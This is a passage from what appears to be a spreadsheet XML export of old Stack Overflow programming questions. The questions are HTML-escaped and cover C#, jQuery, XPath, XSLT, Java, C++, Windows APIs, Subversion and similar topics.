So first solution that cames to my mind was something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public interface IColumn
{
    bool HasChanges { get; }
    void AcceptChanges();
}
public struct Column&amp;lt;T&amp;gt; : IColumn {...}
public class Record
{
    Column&amp;lt;int&amp;gt; id;
    Column&amp;lt;string&amp;gt; name;
    Column&amp;lt;DateTime?&amp;gt; someDate;
    Column&amp;lt;int?&amp;gt; someInt;
    IColumn[] Columns { get { return new IColumn[] {id, name, someDate, someInt}; }}
    public bool HasChanges
    {
        get
        {
            bool has = false;
            IColumn[] columns = Columns;            //clone and boxing
            for (int i = 0; i &amp;lt; columns.Length; i++)
                has |= columns[i].HasChanges;
            return has;
        }
    }
    public void AcceptChanges()
    {
        IColumn[] columns = Columns;            //clone and boxing
        for (int i = 0; i &amp;lt; columns.Length; i++)
            columns[i].AcceptChanges();         //Here we are changing clone
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see from comments we have few problems here with struct cloning. Simple solution to this is to change Column to class, but from my tests it seems that it increases memory usage by ~40% (because of each object metadata) which is not acceptable for me.
&lt;br&gt;
&lt;br&gt;
So my question is: does anyone have any other ideas how to create methods that can work on different structured objects/records? Maybe someone from F# community can suggest how such problems are solved in functional languages and how it impacts performance and memory usage.
&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Edit:&lt;/strong&gt;&lt;br&gt;
sfg thanks for suggestion about macros.&lt;br&gt;
In Visual Studio 2008 there is built-in (but not so known) template engine called T4. Tha whole point is to add '.tt' file to my project and create a template that will search all my classes, recognize somehow the ones that are records (for example by some interface they implement) and produce partial classes with HasChanges and AcceptChanges() that will call only Columns the class contain.&lt;br&gt;&lt;br&gt;
Some usefull links:&lt;br&gt;
&lt;a href="http://www.t4editor.net/" rel="nofollow" title="T4 Editor for VS"&gt;T4 Editor for VS&lt;/a&gt;&lt;br&gt;
&lt;a href="http://www.olegsych.com/2007/12/text-template-transformation-toolkit/" rel="nofollow" title="Blog with links and tutorials about T4"&gt;Blog with links and tutorials about T4&lt;/a&gt;&lt;br&gt;
&lt;a href="http://www.olegsych.com/2008/07/t4-template-for-generating-sql-view-from-csharp-enumeration/" rel="nofollow" title="Blog entry with example that uses EnvDTE to read project files"&gt;Blog entry with example that uses EnvDTE to read project files&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery override form submit not working when submit called by javascript on a element</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a page with a normal form with a submit button and some jQuery which binds to the form submit event and overrides it with &lt;code&gt;e.preventDefault()&lt;/code&gt; and runs an AJAX command. This works fine when the submit button is clicked but when a link with &lt;code&gt;onclick='document.formName.submit();'&lt;/code&gt; is clicked, the event is not caught by the AJAX form submit event handler. Any ideas why not or how to get this working without binding to all the a elements?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can XPath do a foreign key lookup across two subtrees of an XML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have the following XML...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
  &amp;lt;base&amp;gt;
    &amp;lt;tent key="1" color="red"/&amp;gt;
    &amp;lt;tent key="2" color="yellow"/&amp;gt;
    &amp;lt;tent key="3" color="blue"/&amp;gt;
  &amp;lt;/base&amp;gt;
  &amp;lt;bucket&amp;gt;
    &amp;lt;tent key="1"/&amp;gt;
    &amp;lt;tent key="3"/&amp;gt;
  &amp;lt;/bucket&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...what would the XPath be that returns that the "bucket" contains "red" and "blue"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Lambda Expressions or Delegates as a Properties or Arguments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to create an ValidationRule class that validates properties on an entity type object.  I'd really like to set the name of the property to inspect, and then give the class a delegate or a lambda expression that will be evaluated at runtime when the object runs its IsValid() method.  Does anyone have a snippet of something like this, or any ideas on how to pass an anonymous method as an argument or property?&lt;/p&gt;
&lt;p&gt;Also, I'm not sure if I'm explaining what I'm trying to accomplish so please ask questions if I'm not being clear.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VBScript Excel Formatting .xlsx files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically I want to know how to set center alignment for a cell using VBScript...&lt;/p&gt;
&lt;p&gt;I've been googling it and can't seem to find anything that helps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Explicit code parallelism in c++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Out of order execution in CPUs means that a CPU can reorder instructions to gain better performance and it means the CPU is having to do some very nifty bookkeeping and such.  There are other processor approaches too, such as hyper-threading.&lt;/p&gt;
&lt;p&gt;Some fancy compilers understand the (un)interrelatedness of instructions to a limited extent, and will automatically interleave instruction flows (probably over a longer window than the CPU sees) to better utilise the processor.  Deliberate compile-time interleaving of floating and integer instructions is another example of this.&lt;/p&gt;
&lt;p&gt;Now I have highly-parallel task.  And I typically have an ageing single-core x86 processor without hyper-threading.&lt;/p&gt;
&lt;p&gt;Is there a straight-forward way to get my the body of my 'for' loop for this highly-parallel task to be interleaved so that two (or more) iterations are being done together?  (This is slightly different from 'loop unwinding' as I understand it.)&lt;/p&gt;
&lt;p&gt;My task is a 'virtual machine' running through a set of instructions, which I'll really simplify for illustration as:&lt;/p&gt;
&lt;pre&gt;void run(int num) {
  for(int n=0; n&amp;lt;num; n++) {
     vm_t data(n);
     for(int i=0; i&amp;lt;data.len(); i++) {
        data.insn(i).parse();
        data.insn(i).eval();
     }
  }  
}&lt;/pre&gt;
&lt;p&gt;So the execution trail might look like this:&lt;/p&gt;
&lt;pre&gt;data(1) insn(0) parse
data(1) insn(0) eval
data(1) insn(1) parse
...
data(2) insn(1) eval
data(2) insn(2) parse
data(2) insn(2) eval&lt;/pre&gt;
&lt;p&gt;Now, what I'd like is to be able to do two (or more) iterations explicitly in parallel:&lt;/p&gt;
&lt;pre&gt;data(1) insn(0) parse
data(2) insn(0) parse  \ processor can do OOO as these two flow in
data(1) insn(0) eval   /
data(2) insn(0) eval   \ OOO opportunity here too
data(1) insn(1) parse  /
data(2) insn(1) parse&lt;/pre&gt;
&lt;p&gt;I know, from profiling, (e.g. using Callgrind with --simulate-cache=yes), that parsing is about random memory accesses (cache missing) and eval is about doing ops in registers and then writing results back.  Each step is several thousand instructions long.  So if I can intermingle the two steps for two iterations at once, the processor will hopefully have something to do whilst the cache misses of the parse step are occurring...&lt;/p&gt;
&lt;p&gt;Is there some c++ template madness to get this kind of explicit parallelism generated?&lt;/p&gt;
&lt;p&gt;Of course I can do the interleaving - and even staggering - myself in code, but it makes for much less readable code.  And if I really want unreadable, I can go so far as assembler!  But surely there is some pattern for this kind of thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting up our new Dev server What is the easiest way to assign multiple IP addresses</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up our new Dev server, what is the easiest way to assign multiple IP addresses to Windows 2008 Server Network Adapter?&lt;/p&gt;
&lt;p&gt;I'm setting up our development machine, running IIS 7 and want to have the range between 192.168.1.200 - .254 available when I'm setting up a new website in IIS 7.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you version your projects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that Microsoft uses this template when versioning their products: Major.Minor.Build.Revision. &lt;/p&gt;
&lt;p&gt;Major is changed when the "developers" want to show that there is a big change in the software and backward compatibility cannot be assumed. Maybe a major rewrite of the code is done. &lt;/p&gt;
&lt;p&gt;Minor number represents a significant enhancement with the intention of backward compatibility. &lt;/p&gt;
&lt;p&gt;Build number is a small change, for example a recompilation of the same source. &lt;/p&gt;
&lt;p&gt;Revision is used to fix a security hole and should be fully interchangeable. Both Build and Revision are optional. This information is based on &lt;a href="http://msdn.microsoft.com/en-us/library/system.version.aspx"&gt;MSDN Version Class&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;How do you version your projects and why do you version them this way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to format 24 hour time in XSLT 1.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've had a hard time finding good ways of taking a time format and easily determining if it's valid then producing a resulting element that has some formatting using XSLT 1.0.&lt;/p&gt;
&lt;p&gt;Given the following xml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
    &amp;lt;srcTime&amp;gt;2300&amp;lt;/srcTime&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It would be great to produce the resulting xml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
    &amp;lt;dstTime&amp;gt;23:00&amp;lt;/dstTime&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if the source xml contains an invalid 24 hour time format, the resulting &lt;em&gt;dstTime&lt;/em&gt; element should be blank.&lt;/p&gt;
&lt;p&gt;For example, when the invalid source xml is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
    &amp;lt;srcTime&amp;gt;NOON&amp;lt;/srcTime&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The resulting xml should be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
    &amp;lt;dstTime&amp;gt;&amp;lt;/dstTime&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The question is, what's the &lt;strong&gt;best XSLT 1.0&lt;/strong&gt; fragment that could be written to produce the desired results? The hope would be to keep it quite simple and not have to parse the every piece of the time (i.e. pattern matching would be sweet if possible).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Enum parameter in method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method lets say:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static String drawCellValue(
    int maxCellLength, String cellValue, String align) { }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and as you can notice, I have a parameter called align. Inside this method I'm going to have some if condition on whether the value is a 'left' or 'right'.. setting the parameter as String, obviously I can pass any string value.. I would like to know if it's possible to have an Enum value as a method parameter, and if so, how?&lt;/p&gt;
&lt;p&gt;Just in case someone thinks about this; I thought about using a Boolean value but I don't really fancy it. First, how to associate true/false with left/right ? (Ok, I can use comments but I still find it dirty) and secondly, I might decide to add a new value, like 'justify', so if I have more than 2 possible values, Boolean type is definitely not possible to use.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the main differences between the popular web frameworks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are &lt;a href="http://en.wikipedia.org/wiki/Comparison_of_web_application_frameworks"&gt;lots of web application frameworks&lt;/a&gt; available these days, for pretty much every language out there.  In your experience, what are their strengths, weaknesses, and unique features?  Assuming the luxury of choice, what factors would lead you to consider one over another other?&lt;/p&gt;
&lt;p&gt;I'm most interested in people's direct experience with one or more frameworks, rather than an exhaustive comparison of everything out there.  Hopefully the SO community has programmers who have good and bad experiences with things like &lt;a href="http://www.rubyonrails.org/"&gt;Rails&lt;/a&gt;, &lt;a href="http://www.asp.net"&gt;ASP.NET&lt;/a&gt;, &lt;a href="http://www.djangoproject.com/"&gt;Django&lt;/a&gt;, &lt;a href="http://turbogears.org/"&gt;TurboGears&lt;/a&gt;, or &lt;a href="http://java.sun.com/javaee/javaserverfaces/"&gt;JSF&lt;/a&gt;.  It would also be great to hear if anyone is using one of the less mainstream frameworks like &lt;a href="http://www.seaside.st/"&gt;Seaside&lt;/a&gt; or &lt;a href="http://common-lisp.net/project/cl-weblocks/"&gt;Weblocks&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Programming language is an obvious difference, but a Java vs Ruby flamewar won't be much fun, and most of these frameworks seem to be at least as much an investment in technology, tools and complexity as their language of choice; so I'm more interested in things like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Development speed and convenience&lt;/li&gt;
&lt;li&gt;Barriers to entry - both in terms of developer training, and of infrastructure needed&lt;/li&gt;
&lt;li&gt;Lock-in - how much code could you keep if you had to switch frameworks?&lt;/li&gt;
&lt;li&gt;Flexibility - does the framework dictate your architecture or design?  (Whether that would be a good or bad thing is probably best left to a separate discussion.)&lt;/li&gt;
&lt;li&gt;Performance, scalability, and stability - obviously depending on the developers!&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Calling Reporting services rdl in Java application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed my reports in SQL REporting services and deployed in my server. I need to display the reports in my java application page. I want to know is there any control (like .net report viewer control) to display this&lt;/p&gt;
&lt;p&gt;Thanks
balaweblog&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I implement a cooperative multi-tasking system in VxWorks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A legacy embedded system is implemented using a cooperative multi-tasking scheduler.  &lt;/p&gt;
&lt;p&gt;The system essentially works along the following lines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Task A does work&lt;/li&gt;
&lt;li&gt;When Task A is done, it yields the processor.&lt;/li&gt;
&lt;li&gt;Task B gets the processor and does work.&lt;/li&gt;
&lt;li&gt;Task B yields&lt;br /&gt;
...  &lt;/li&gt;
&lt;li&gt;Task n yields&lt;/li&gt;
&lt;li&gt;Task A gets scheduled and does work&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One big Circular Queue: A -&gt; B -&gt; C -&gt; ... -&gt; n -&gt; A&lt;/p&gt;
&lt;p&gt;We are porting the system to a new platform and want to minimize system redesign.&lt;/p&gt;
&lt;p&gt;Is there a way to implement that type of cooperative multi-tasking in vxWorks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you acess a property of a bean for reading in a spring xml config file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do something like the following in spring:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;beans&amp;gt;
    ...
    &amp;lt;bean id="bean1" ... /&amp;gt;
    &amp;lt;bean id="bean2"&amp;gt;
        &amp;lt;property name="propName" value="bean1.foo" /&amp;gt;
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would think that this would access the getFoo() method of bean1 and call the setPropName() method of bean2, but this doesn't seem to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get CreateProcess/CreateProcessW to execute a process in a path &gt; MAX_PATH characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get either CreateProcess or CreateProcessW to execute a process with a name &amp;lt; MAX&amp;#95;PATH characters but in a path that's greater than MAX&amp;#95;PATH characters.  According to the docs at: &lt;a href="http://msdn.microsoft.com/en-us/library/ms682425.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/ms682425.aspx&lt;/a&gt;, I need to make sure lpApplicationName isn't NULL and then lpCommandLine can be up to 32,768 characters.&lt;/p&gt;
&lt;p&gt;I tried that, but I get ERROR&amp;#95;PATH&amp;#95;NOT&amp;#95;FOUND.&lt;/p&gt;
&lt;p&gt;I changed to CreateProcessW, but still get the same error.  When I prefix lpApplicationName with \\?\ as described in &lt;a href="http://msdn.microsoft.com/en-us/library/aa365247(VS.85).aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/aa365247(VS.85).aspx&lt;/a&gt; when calling CreateProcessW I get a different error that makes me think I'm a bit closer:  ERROR&amp;#95;SXS&amp;#95;CANT&amp;#95;GEN&amp;#95;ACTCTX.&lt;/p&gt;
&lt;p&gt;My call to CreateProcessW is:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;
    CreateProcessW(w&amp;#95;argv0,arg_string,NULL,NULL,0,NULL,NULL,&amp;amp;si,&amp;amp;ipi);
&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;where w_argv0 is &lt;code&gt;\\?\&amp;lt;long absolute path&amp;gt;\foo.exe.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;arg_string contains "&amp;lt;long absolute path&amp;gt;\foo.exe" foo  &lt;/p&gt;
&lt;p&gt;si is set as follows:&lt;/p&gt;
&lt;pre&gt;
    memset(&amp;si,0,sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;&gt;
&lt;/pre&gt;
&lt;p&gt;and pi is empty, as in:&lt;/p&gt;
&lt;pre&gt;
    memset(&amp;pi,0,sizeof(pi));
&lt;/pre&gt;
&lt;p&gt;I looked in the system event log and there's a new entry each time I try this with event id 59, source SideBySide: Generate Activation Context failed for .Manifest. Reference error message: The operation completed successfully.&lt;/p&gt;
&lt;p&gt;The file I'm trying to execute runs fine in a path &amp;lt; MAX_PATH characters.&lt;/p&gt;
&lt;p&gt;To clarify, no one component of &amp;lt;long absolute path&amp;gt; is greater than MAX&amp;#95;PATH characters.  The name of the executable itself certainly isn't, even with .manifest on the end.  But, the entire path together is greater than MAX&amp;#95;PATH characters long.&lt;/p&gt;
&lt;p&gt;I get the same error whether I embed its manifest or not.  The manifest is named foo.exe.manifest and lives in the same directory as the executable when it's not embedded.  It contains:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;?xml version='1.0' encoding='UTF-8' standalone='yes'?&gt;
&amp;lt;assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'&gt;
  &amp;lt;dependency&gt;
    &amp;lt;dependentAssembly&gt;
      &amp;lt;assemblyIdentity type='win32' name='Microsoft.VC80.DebugCRT' version='8.0.50727.762' processorArchitecture='x86' publicKeyToken='1fc8b3b9a1e18e3b' /&gt;
    &amp;lt;/dependentAssembly&gt;
  &amp;lt;/dependency&gt;
&amp;lt;/assembly&gt;
&lt;/pre&gt;
&lt;p&gt;Anyone know how to get this to work?  Possibly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;some other way to call CreateProcess or CreateProcessW to execute a process in a path &gt; MAX_PATH characters&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;something I can do in the manifest file&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm building with Visual Studio 2005 on XP SP2 and running native.&lt;/p&gt;
&lt;p&gt;Thanks for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design Time viewing for User Control events</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've create a WinForms control that inherits from System.Windows.Forms.UserControl...I've got some custom events on the control that I would like the consumer of my control to be able to see. I'm unable to actually get my events to show up in the Events tab of the Properties window during design time. This means the only way to assign the events is to programmatically write &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myUserControl.MyCustomEvent += new MyUserControl.MyCustomEventHandler(EventHandlerFunction);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this is fine for me I guess but when someone else comes to use my UserControl they are not going to know that these events exist (unless they read the library doco...yeah right). I know the event will show up using Intellisense but it would be great if it could show in the properties window too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are your "hard rules" about commenting your code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen the other questions &lt;em&gt;but I am still not satisfied with the way this subject is covered&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I would like to extract a distiled list of things to check on comments at a code inspection.&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;I am sure people will say things that will just cancel each other. But hey, maybe we can build a list for each camp. For the guys who don't comment at all the list will just be very short :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is the PageAction.Details route necessary in the default Dynamic Data template?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the default Visual Studio template for a dynamic data web application, Global.asax includes the following two sample routes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// route #1
routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx") {
    Action = PageAction.List,
    ViewName = "ListDetails",
    Model = model
});
// route #2
routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx") {
    Action = PageAction.Details,
    ViewName = "ListDetails",
    Model = model
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;They only differ by the Action property. The comments in Global.asax indicate the two routes are used to configure a single page that handles all CRUD behaviors.&lt;/p&gt;
&lt;p&gt;Why is route #2 is necessary? Does it do anything? ListDetails.aspx does not look at the Action property of the route. It seems that everything runs fine when I comment out route #2 and I only have route #1 in Global.asax. Route #2 looks like its not used.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mathematical optimization library for Java --- free or open source recommendations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of such a library that performs mathematical optimization (linear programming, convex optimization, or more general types of problems)? I'm looking for something like MATLAB, but with the ability to handle larger problems. Do I have to write my own implementations, or buy one of those commercial products (CPLEX and the like)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to synchronize two Subversion repositories?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company has a subsidiary with a slow Internet connection. Our developers there suffer to interact with our central &lt;a href="http://en.wikipedia.org/wiki/Subversion%5F%28software%29"&gt;Subversion&lt;/a&gt; server. Is it possible to configure a slave/mirror  for them? They would interact locally with the server and all the commits would be automatically synchronized to the master server. &lt;/p&gt;
&lt;p&gt;This should work as transparently as possible for the developers. Usability is a must.&lt;/p&gt;
&lt;p&gt;Please, no suggestions to change our version control system.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bron-Kerbosch algorithm for clique finding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone tell me, where on the web I can find an explanation for Bron-Kerbosch algorithm for clique finding or explain here how it works?&lt;/p&gt;
&lt;p&gt;I know it was published in "Algorithm 457: finding all cliques of an undirected graph" book, but I can't find free source that will describe the algorithm.&lt;/p&gt;
&lt;p&gt;I don't need a source code for the algorithm, I need an explanation of how it works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create cronjob with Zend Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a cronjob controller, so I can call one website and have all modules cronjob.php executed. Now my problem is how do I do that?&lt;/p&gt;
&lt;p&gt;Would curl be an option, so I also can count the errors and successes?&lt;/p&gt;
&lt;p&gt;[Update]&lt;/p&gt;
&lt;p&gt;I guess I have not explained it enough. &lt;/p&gt;
&lt;p&gt;What I want to do is have one file which I can call like from &lt;a href="http://server/cronjob"&gt;http://server/cronjob&lt;/a&gt; and then make it execute every /application/modules/*/controller/CronjobController.php or have another way of doing it so all the cronjobs aren't at one place but at the same place the module is located. This would offer me the advantage, that if a module does not exist it does not try to run its cronjob.&lt;/p&gt;
&lt;p&gt;Now my question is how would you execute all the modules CronjobController or would you do it a completly different way so it still stays modular?&lt;/p&gt;
&lt;p&gt;And I want to be able to giveout how many cronjobs ran successfully and how many didn't&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Text to Speech engines overview</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm now in search for a Java Text to Speech (TTS) framework. During my investigations I've found several JSAPI1.0-(partially)-compatible frameworks listed on &lt;a href="http://java.sun.com/products/java-media/speech/reference/codesamples/index.html"&gt;JSAPI Implementations page&lt;/a&gt;, as well as a pair of Java TTS frameworks which do not appear to follow JSAPI spec (&lt;a href="http://mary.dfki.de/"&gt;Mary&lt;/a&gt;, &lt;a href="http://www.say-it-now.com/mainsite.htm"&gt;Say-It-Now&lt;/a&gt;). I've also noted that currently no reference implementation exists for JSAPI.&lt;/p&gt;
&lt;p&gt;Brief tests I've done for FreeTTS (first one listed in JSAPI impls page) show that it is far from reading simple and obvious words (examples: ABC, blackboard). Other tests are currently in progress.&lt;/p&gt;
&lt;p&gt;And here goes the question (6, actually):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Which of the Java-based TTS frameworks have you used?&lt;/li&gt;
&lt;li&gt;Which ones, by your opinion, are capable of reading the largest wordbase?&lt;/li&gt;
&lt;li&gt;What about their voice quality?&lt;/li&gt;
&lt;li&gt;What about their performance?&lt;/li&gt;
&lt;li&gt;Which non-Java frameworks with Java bindings are there on the scene?&lt;/li&gt;
&lt;li&gt;Which of them would you recommend?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thank you in advance for your comments and suggestions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I modify a saved Microsoft Access 2007 or 2010 Import Specification?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to modify an existing import specification in Microsoft Access 2007 or 2010?  In older versions there used to be an Advanced button presented during the import wizard that allowed you to select and edit an existing specification.  I no longer see this feature but hope that it still exists and has just been moved somewhere else.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>linker woes - undefined reference</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a problem with my compiler telling me there is an 'undefined reference to' a function I want to use in a library. Let me share some info on the problem:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I'm cross compiling with gcc for C.&lt;/li&gt;
&lt;li&gt;I am calling a library function which is accessed through an included header which includes another header, which contains the prototype.&lt;/li&gt;
&lt;li&gt;I have included the headers directory using -I and i'm sure it's being found.&lt;/li&gt;
&lt;li&gt;I'm first creating the .o files then linking them in a separate command.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So my thought is it might be the order in which I include the library files, but i'm not sure what is the correct way to order them. I tried with including the headers folder both before and after the .o file.&lt;/p&gt;
&lt;p&gt;Some suggests would be great, and maybe and explanation of how the linker does its thing.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Response to answers&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;there is no .a library file, just .h and .c in the library, so -l isn't appropriate&lt;/li&gt;
&lt;li&gt;my understanding of a library file is that it is just a collection of header and source files, but maybe it's a collection of .o files created from the source?!&lt;/li&gt;
&lt;li&gt;there is no library object file being created, maybe there should be?? Yes seems I don't understand the difference between includes and libraries...i'll work on that :-)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks for all the responses! I learned a lot about libraries. I'd like to put all the responses as the accepted answer :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find open source 2d bin packing algorithms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for open source (preferably c++) algorithms for 2d bin packing of rectangular and or irregular shapes. I've found several papers on the subject but no code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best system for installing a Perl web app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that most of the installers for Perl are centered around installing Perl modules, not applications.  Things like ExtUtils::MakeMaker and Module::Build are very well suited for modules, but require some additional work for Web Apps.&lt;/p&gt;
&lt;p&gt;Ideally it would be nice to be able to do the following after checking out the source from the repository:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Have missing dependencies detected&lt;/li&gt;
&lt;li&gt;Download and install dependencies from CPAN&lt;/li&gt;
&lt;li&gt;Run a command to "Build" the source into a final state (perform any source parsing or configuration necessary for the local environment).&lt;/li&gt;
&lt;li&gt;Run a command to install the built files into the appropriate locations.  Not only the perl modules, but also things like template (.tt) files, and CGI scripts, JS and image files that should be web-accessible.&lt;/li&gt;
&lt;li&gt;Make sure proper permissions are set on installed files (and SELinux context if necessary).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Right now we have a system based on &lt;strong&gt;Module::Build&lt;/strong&gt; that does most of this. The work was done by done by my co-worker who was learning to use &lt;strong&gt;Module::Build&lt;/strong&gt; at the time, and we'd like some advice on generalizing our solution, since it's fairly app-specific right now.  In particular, our system requires us to install dependencies by hand (although it does detect them).&lt;/p&gt;
&lt;p&gt;Is there any particular system you've used that's been particularly successful?  Do you have to write an installer based on &lt;strong&gt;Module::Build&lt;/strong&gt; or &lt;strong&gt;ExtUtils::MakeMaker&lt;/strong&gt; that's particular to your application, or is something more general available?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; To answer brian's questions below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can log into the machines&lt;/li&gt;
&lt;li&gt;We do not have root access to the machines&lt;/li&gt;
&lt;li&gt;The machines are all (ostensibly) identical builds of RHEL5 with SELinux enabled&lt;/li&gt;
&lt;li&gt;Currently, the people installing the machines are only programmers from our group, and our source is not available to the general public.  However, it's conceivable our source could eventually be installed on someone else's machines in our organization, to be installed by their programmers or systems people.&lt;/li&gt;
&lt;li&gt;We install by checking out from the repository, though we'd like to have the option of using a distributed archive (see above).&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>MySQL and data file encryption</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to encrypt the data file that mysql uses? I have a mysql server on an open machine, and I would like to encrypt the data file so even if someone copies the data files, they cannot read the data.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What books should I read to have an undergraduate education in Computer Science?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've always been a largely independent learner gleaning what I can from Wikipedia and various books. However, I fear that I may have biased my self-education by inadvertent omission of topics and concepts. My goal is to teach myself the equivalent of an undergraduate degree in Computer Science from a top university (doesn't matter which one). &lt;/p&gt;
